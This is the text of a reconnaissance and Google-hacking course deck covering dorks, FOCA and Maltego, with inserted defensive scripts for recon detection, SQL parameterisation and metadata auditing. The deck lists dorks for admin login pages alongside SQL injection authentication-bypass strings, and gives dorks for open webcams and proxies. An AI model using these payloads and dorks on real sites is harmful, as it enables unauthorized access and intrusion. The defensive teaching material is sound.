Published by Moses Park. Modified over 8 years ago.
Course about Information Gathering for Hacking
Agenda day 1
- Introduction about Information Gathering
- Why information is useful
- Using free tools
- Let's start: gather information!
Agenda day 2
- Tools & Techniques
- Browser power
- Using DNS
- Using Google
- Free tools: Maltego, FOCA
- Summarizing all information
Agenda day 3
- Ready for attack
- Decide how to attack
- Live demo!
- Questions?
Introduction about Information Gathering
- Through reconnaissance, an attacker can gather a large amount of information about a site, domain or IP address.
- This information can be used to plan an attack.
- It can be obtained with freely available tools... or using the browser.
Where Does This Information Come From?
- Web 2.0... how I <3 thee...
- Public data and records.
- Information that is mandatory for the Internet (DNS, whois, MX).
- Private data we pay for, i.e. Lexis Nexis / Choice Point / Find a Friend / Spoke / Zoominfo.
- Data placed there by the target.
- Data placed there by the target's users.
Why information is useful: how to link the real world and the digital world
Real world:
- Emails
- Persons
- Phone numbers
- Address
- Documents
- Patents / Projects
- Sentences / Words...
- Habits / Hobbies
- Social affinities...
Digital world:
- IP, hosts, netblocks, AS
- Whois records / rWhois
- Forward and reverse DNS
- Google
- Document metadata
- Twitter, Facebook, ...
- XFN, vCards, hCards
- Face detection, ...
- ip2geo, Google
Types of Information Gathering
- Passive
- Semi-Passive
- Active
Passive Information Gathering
- Great care is taken to ensure that the target organization does not detect the profiling.
- This means that no packets can ever be sent to the target.
- This type of profiling is typically time intensive.
NO TRAFFIC
Semi-Passive Information Gathering
- Profiling the target with methods that would appear to the target as normal Internet traffic and behavior.
NORMAL TRAFFIC
Active Information Gathering
- This type of profiling should be detected by the target organization.
- Actively seeking out new/unpublished servers, directories, files and documents, along with full network visibility scans.
ABNORMAL TRAFFIC
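The three profiling types above differ in what the target can observe, and the active case is the one the slide says the organization should detect. As an added example that is not part of the presentation, the Python script below shows that defender's side: it parses Apache-style access-log lines and flags clients whose behaviour looks like active reconnaissance, i.e. a high share of 404 responses and requests for the kinds of unpublished admin, camera and proxy pages that the Google dorks later in this deck look for. The log lines, IP addresses and the path watchlist are all constructed for the example, not taken from real traffic.

```python
import re
from collections import defaultdict

# Constructed sample of Apache "combined" access-log lines (not real traffic).
# 203.0.113.10 browses the site normally; 198.51.100.7 requests pages that are
# not linked anywhere on the site and collects mostly 404 responses.
SAMPLE_LOG = """\
203.0.113.10 - - [10/Oct/2023:13:55:36 +0000] "GET / HTTP/1.1" 200 5120 "-" "Mozilla/5.0"
203.0.113.10 - - [10/Oct/2023:13:55:38 +0000] "GET /about.html HTTP/1.1" 200 2048 "-" "Mozilla/5.0"
203.0.113.10 - - [10/Oct/2023:13:55:40 +0000] "GET /contact.html HTTP/1.1" 200 1024 "-" "Mozilla/5.0"
198.51.100.7 - - [10/Oct/2023:14:01:01 +0000] "GET /admin.asp HTTP/1.1" 404 512 "-" "curl/7.68.0"
198.51.100.7 - - [10/Oct/2023:14:01:02 +0000] "GET /admin/login.asp HTTP/1.1" 404 512 "-" "curl/7.68.0"
198.51.100.7 - - [10/Oct/2023:14:01:03 +0000] "GET /view/index.shtml HTTP/1.1" 404 512 "-" "curl/7.68.0"
198.51.100.7 - - [10/Oct/2023:14:01:04 +0000] "GET /nph-proxy.cgi HTTP/1.1" 404 512 "-" "curl/7.68.0"
198.51.100.7 - - [10/Oct/2023:14:01:05 +0000] "GET /index.html HTTP/1.1" 200 4096 "-" "curl/7.68.0"
"""

# Fields of the combined log format that the detector needs.
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] "(?P<method>\S+) (?P<path>\S+) [^"]*" (?P<status>\d{3})'
)

# Constructed watchlist: paths a published site does not link to, but which the
# dorks in this deck search for. A request for one is a strong recon signal.
PROBE_PATHS = ("/admin.asp", "/admin/login.asp", "/adminlogin.asp", "/admin_login.asp",
               "/view.shtml", "/view/index.shtml", "/viewerframe", "/nph-proxy.cgi")


def parse_line(line):
    """Return a dict of the log fields, or None for a line that does not parse."""
    m = LOG_RE.match(line)
    if not m:
        return None
    rec = m.groupdict()
    rec["status"] = int(rec["status"])
    rec["path_lower"] = rec["path"].lower()
    return rec


def find_recon(log_text, min_requests=3, max_404_ratio=0.5):
    """Map each suspicious client IP to the list of reasons it was flagged."""
    per_ip = defaultdict(lambda: {"total": 0, "not_found": 0, "probes": set()})
    for line in log_text.splitlines():
        rec = parse_line(line)
        if rec is None:
            continue
        stats = per_ip[rec["ip"]]
        stats["total"] += 1
        if rec["status"] == 404:
            stats["not_found"] += 1
        for probe in PROBE_PATHS:
            if rec["path_lower"].startswith(probe):
                stats["probes"].add(rec["path"])

    flagged = {}
    for ip, s in per_ip.items():
        reasons = []
        # Many 404s from one client means it is guessing names, not following links.
        if s["total"] >= min_requests and s["not_found"] / s["total"] > max_404_ratio:
            reasons.append(f"{s['not_found']}/{s['total']} requests returned 404")
        if s["probes"]:
            reasons.append("probed " + ", ".join(sorted(s["probes"])))
        if reasons:
            flagged[ip] = reasons
    return flagged


if __name__ == "__main__":
    for ip, reasons in find_recon(SAMPLE_LOG).items():
        print(ip, "->", "; ".join(reasons))
```

Both signals are deliberately simple: the 404 ratio catches name guessing in general, and the watchlist catches the specific pages this deck's dorks look for even when the guess happens to succeed. On a real server the thresholds and the watchlist would be tuned to what the site actually publishes.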
Google Hacking
- Web hacking: pick a site, find the vulnerability.
- Google hacking: pick a vulnerability, find the site.
How Google Works
- Googlebot, a web crawler that finds and fetches web pages.
- The indexer, which sorts every word on every page and stores the resulting index of words in a huge database.
- The query processor, which compares your search query to the index and recommends the documents that it considers most relevant.
How Googlebot Works
Googlebot finds pages in two ways:
- through an add URL form, www.google.com/addurl.html
- through finding links by crawling the web.
Indexer and Query Processor
Indexer:
- Googlebot gives the indexer the full text of the pages it finds.
- These pages are stored in Google's index database in alphabetical order.
- Each index entry stores a list of documents in which the term appears and the location within the text where it occurs.
Query processor:
- Page ranking puts more important pages at a higher rank.
- Intelligent techniques for learning relationships and associations within the stored data.
- Spelling correction system.
The Basics
Some important things to keep in mind:
- Google queries are not case sensitive.
- The * wildcard represents any word. Example: "* insurance quote"
- Google stems words automatically. Example: "automobile insurance quote" brings up sites with "auto ...".
The Basics
- The + symbol forces inclusion of a certain word: "auto insurance +progressive"
- The - symbol forces exclusion of a certain word: site:progressive.com -site:www.progressive.com
- The | symbol provides boolean OR logic: "auto insurance + inurl:(progressive | geico)"
Information Disclosure with Google Advanced Search Operators
- site: (.edu, .gov, foundstone.com, usc.edu)
- filetype: (txt, xls, mdb, pdf, .log)
- daterange: (Julian date format)
- intitle / allintitle
- inurl / allinurl
Advanced Operators
- link:URL = lists other pages that link to the URL.
- related:URL = lists other pages that are related to the URL.
- site:domain.com "search term" = restricts search results to the given domain.
- allinurl:WORDS = shows only pages with all search terms in the URL.
- inurl:WORD = like allinurl:, but filters the URL based on the first term only.
- allintitle:WORD = shows only results with the terms in the title.
- intitle:WORD = similar to allintitle:, but only for the next word.
- cache:URL = shows the Google cached version of the URL.
The Basics
There are many more advanced operators. Combining these creatively is the key to Google hacking: http://www.googleguide.com/advanced_operators_reference.html
BUT DO YOU REALLY NEED TO REMEMBER IT?
Advanced Search with Google
INTERESTING SEARCHES...
Now that we've gotten this boring stuff out of the way, let's introduce some Google hacks.
Google and Proxy
- Use www.google.com/translate to bypass Internet browser security settings.
- Find a proxy that works, and enter in the URL:
  - inurl:"nph-proxy.cgi" "start using cgiproxy"
  - inurl:"nph-proxy.cgi" "Start browsing through this CGI-based proxy"
Gaining auth bypass on an admin account
There are a large number of Google dorks for basic SQL injection:
- "inurl:admin.asp"
- "inurl:login/admin.asp"
- "inurl:admin/login.asp"
- "inurl:adminlogin.asp"
- "inurl:adminhome.asp"
- "inurl:admin_login.asp"
- "inurl:administratorlogin.asp"
- "inurl:login/administrator.asp"
- "inurl:administrator_login.asp"
SQL Injection
Keep the username as "Admin" and for the password type one of the following:
- ' or '1'='1
- ' or 'x'='x
- ' or 0=0 --
- " or 0=0 --
- or 0=0 --
- ' or 0=0 #
- " or 0=0 #
- or 0=0 #
- ' or 'x'='x
- " or "x"="x
- ') or ('x'='x
- ' or 1=1--
- " or 1=1--
- or 1=1--
- ' or a=a--
- " or "a"="a
- ') or ('a'='a
- ") or ("a"="a
- hi" or "a"="a
- hi" or 1=1 --
- hi' or 1=1 --
- blah' 'or'1=1'
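Why these strings work, and what stops them, as an added example that is not part of the presentation: a Python sqlite3 login check written the vulnerable way (user input concatenated into the SQL text) next to the parameterised version. The users table and the stored password are constructed for the example; two of the payloads from the slide are fed to both functions so the difference is visible.

```python
import sqlite3


def make_db():
    """In-memory database with one constructed user row (not real credentials)."""
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE users (username TEXT, password TEXT)")
    conn.execute("INSERT INTO users VALUES ('Admin', 'correct-horse-battery-staple')")
    conn.commit()
    return conn


def login_vulnerable(conn, username, password):
    """Login check that builds the query by string concatenation.

    With password  ' or '1'='1  the WHERE clause becomes
        username = 'Admin' AND password = '' or '1'='1'
    which is true for every row, so the check passes without the password.
    """
    query = ("SELECT username FROM users WHERE username = '" + username
             + "' AND password = '" + password + "'")
    return conn.execute(query).fetchone() is not None


def login_safe(conn, username, password):
    """Same check with a parameterised query.

    The values travel separately from the SQL text, so a quote inside the
    password is just a character to compare against the stored value.
    """
    row = conn.execute(
        "SELECT username FROM users WHERE username = ? AND password = ?",
        (username, password),
    ).fetchone()
    return row is not None


def bypass_report(conn, payloads):
    """For each payload, report whether it logs in as Admin against each version."""
    return {p: (login_vulnerable(conn, "Admin", p), login_safe(conn, "Admin", p))
            for p in payloads}


if __name__ == "__main__":
    db = make_db()
    for payload, (vuln, safe) in bypass_report(db, ["' or '1'='1", "' or 1=1--"]).items():
        print(f"{payload!r:16} concatenated: {vuln}  parameterised: {safe}")
```

Only the `'`-quoted and `--`-comment payloads from the slide are exercised here: SQLite does not treat `#` as a comment, so the `#` variants raise a syntax error against it rather than bypassing the check (they target MySQL). The fix is the same in every database and driver: never build the query text from user input.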
Few more interesting searches
- Browsing images of the site: site:xxxxxxx in Google Images
- Browse live video cameras: inurl:"viewerframe?mode=motion" (e.g. http://202.212.193.26:555/ViewerFrame?Mode=Motion&Language=0); intitle:"Live View / - AXIS"
- Browse open webcams worldwide: Axis webcams: inurl:/view.shtml or inurl:view/index.shtml; Canon webcams: sample/LvAppl/
- Server versioning: intitle:index.of "server at"
GOOGLE HACK
Google Hacks is a compilation of carefully crafted Google searches that expose novel functionality from Google's search and map services. You can use it to view a timeline of your search results, view a map, search for music, search for books, and perform many other specific kinds of searches. You can also use this program to use Google as a proxy.
Google Hack screenshot
Screenshot of GOOLAG SCANNER
Using Tools
FOCA: metadata
"Secret" relationships:
- Government & companies
- Companies & providers
- Piracy
- Reputation
- Social engineering attacks
- Targeting
- Malware
FOCA: file types supported
- Office documents:
  - Open Office documents.
  - MS Office documents.
  - PDF documents (XMP).
  - EPS documents.
- Graphic documents (EXIF, XMP):
  - Adobe InDesign, SVG, SVGZ
What can be found?
- Users:
  - Creators.
  - Modifiers.
  - Users in paths, e.g. C:\Documents and settings\jfoo\myfile, /home/johnnyf
- Operating systems.
- Printers:
  - Local and remote.
- Paths:
  - Local and remote.
- Network info:
  - Shared printers.
  - Shared folders.
  - ACLs.
- Internal servers:
  - NetBIOS name.
  - Domain name.
  - IP address.
- Database structures:
  - Table names.
  - Column names.
- Devices info:
  - Mobiles.
  - Photo cameras.
- Private info:
  - Personal data.
- History of use.
- Software versions.
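To show where the user names, local paths and software versions on that slide actually live inside a file, here is an added example that is not FOCA's code: a Python audit that opens a .docx (a zip archive whose docProps/core.xml and docProps/app.xml parts hold the document properties), pulls the creator, last-modified-by, application, version and template fields, and reports what a reviewer should strip before the file is published. The document produced by build_sample_docx() and every value in it are constructed for the example.

```python
import io
import zipfile
import xml.etree.ElementTree as ET

# XML namespaces used by the two OOXML property parts.
NS = {
    "cp": "http://schemas.openxmlformats.org/package/2006/metadata/core-properties",
    "dc": "http://purl.org/dc/elements/1.1/",
    "ep": "http://schemas.openxmlformats.org/officeDocument/2006/extended-properties",
}


def build_sample_docx():
    """Constructed stand-in for a real .docx: a zip with the two property parts.

    The user names, domain and template path are invented for the example.
    """
    core = (
        '<?xml version="1.0" encoding="UTF-8"?>'
        '<cp:coreProperties xmlns:cp="%s" xmlns:dc="%s">'
        '<dc:creator>jfoo</dc:creator>'
        '<cp:lastModifiedBy>CORP\\jdoe</cp:lastModifiedBy>'
        '</cp:coreProperties>' % (NS["cp"], NS["dc"])
    )
    app = (
        '<?xml version="1.0" encoding="UTF-8"?>'
        '<Properties xmlns="%s">'
        '<Application>Microsoft Office Word</Application>'
        '<AppVersion>16.0000</AppVersion>'
        '<Template>C:\\Users\\jfoo\\AppData\\Roaming\\Microsoft\\Templates\\corp.dotx</Template>'
        '</Properties>' % NS["ep"]
    )
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w") as z:
        z.writestr("docProps/core.xml", core)
        z.writestr("docProps/app.xml", app)
        z.writestr("word/document.xml", "<w/>")  # body content is irrelevant here
    return buf.getvalue()


def _text(root, path):
    el = root.find(path, NS)
    return el.text if el is not None and el.text else None


def extract_metadata(docx_bytes):
    """Return the property fields that metadata-harvesting tools read from a .docx."""
    found = {}
    with zipfile.ZipFile(io.BytesIO(docx_bytes)) as z:
        names = set(z.namelist())
        if "docProps/core.xml" in names:
            core = ET.fromstring(z.read("docProps/core.xml"))
            found["creator"] = _text(core, "dc:creator")
            found["last_modified_by"] = _text(core, "cp:lastModifiedBy")
        if "docProps/app.xml" in names:
            app = ET.fromstring(z.read("docProps/app.xml"))
            found["application"] = _text(app, "ep:Application")
            found["app_version"] = _text(app, "ep:AppVersion")
            found["template"] = _text(app, "ep:Template")
    return {k: v for k, v in found.items() if v}


def audit(docx_bytes):
    """List the disclosures a reviewer should clear before publishing the file."""
    meta = extract_metadata(docx_bytes)
    findings = []
    for field in ("creator", "last_modified_by"):
        if field in meta:
            findings.append(f"{field} reveals a user name: {meta[field]}")
    if "\\" in meta.get("last_modified_by", ""):
        findings.append("last_modified_by contains a Windows domain prefix")
    if meta.get("template", "").startswith(("C:\\", "/home/")):
        findings.append(f"template reveals a local path: {meta['template']}")
    if "app_version" in meta:
        findings.append(f"software version disclosed: {meta.get('application')} {meta['app_version']}")
    return findings


if __name__ == "__main__":
    for finding in audit(build_sample_docx()):
        print("-", finding)
```

The same zip-plus-XML layout is used by .xlsx and .pptx, so the reader generalises to those with no change; PDF and image metadata (XMP, EXIF) need a different parser, which is why tools like FOCA ship several. Running a check like this on outbound documents, or stripping the properties in the export step, removes most of what the slide lists.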
Sample: FBI.gov
Total: 4841 files
DNS Search Panel
Huge domains case
Digital Certificates
FOCA & Shodan
FOCA URL Analysis
.listing
Insecure HTTP Methods
Search & Upload
Searching for Server-Side Technologies
RDP & ICA Files Analysis
Squid Proxies
DNS Records
Netrange Scan
Easy Bugs search
Task List
Plugins
Maltego (Paterva)
Maltego is an open source intelligence and forensics application. It offers timely mining and gathering of information as well as the representation of this information in an easy-to-understand format.
Maltego: which information
- People
- Groups of people (social networks)
- Companies
- Organizations
- Web sites
- Internet infrastructure such as: domains, DNS names, netblocks, IP addresses
- Phrases
- Affiliations
- Documents and files
These entities are linked using open source intelligence. Maltego is easy and quick to install: it uses Java, so it runs on Windows, Mac and Linux. Maltego provides a graphical interface that makes seeing these relationships instant and accurate, making it possible to see hidden connections. Using the graphical user interface (GUI) you can see relationships easily, even if they are three or four degrees of separation away. Maltego is unique because it uses a powerful, flexible framework that makes customizing possible; as such, Maltego can be adapted to your own, unique requirements.
Maltego (Paterva)
Maltego CE: web site
Maltego CE: Twitter
Few interesting websites
- www.archive.org: archive of websites (Time Machine)
- www.readnotify.com: find out when your email gets read; retract, certify, track & much more
- www.guerrillamail.com: provides you with disposable e-mail addresses which expire after 15 minutes
- www.gorillaemail.com: email marketing solutions that allow you to send, track and confirm delivery of emails, newsletters, events etc.
Open source: some links
- DNS, Whois: http://dnshistory.org, ...
- http://www.netcraft.com, http://www.robtex.com, ...
- http://www.ip2geo.com, http://www.maxmind.com, ...
- http://www.infogreffe.com, http://www.societe.com, ...
- http://fr.espacenet.com, http://www.inpi.com, ...
- http://twitter.com, http://www.monster.com, http://www.facebook.com, http://www.linkedin.com
- http://www.alchemyapi.com, http://www.opencalais.com, ...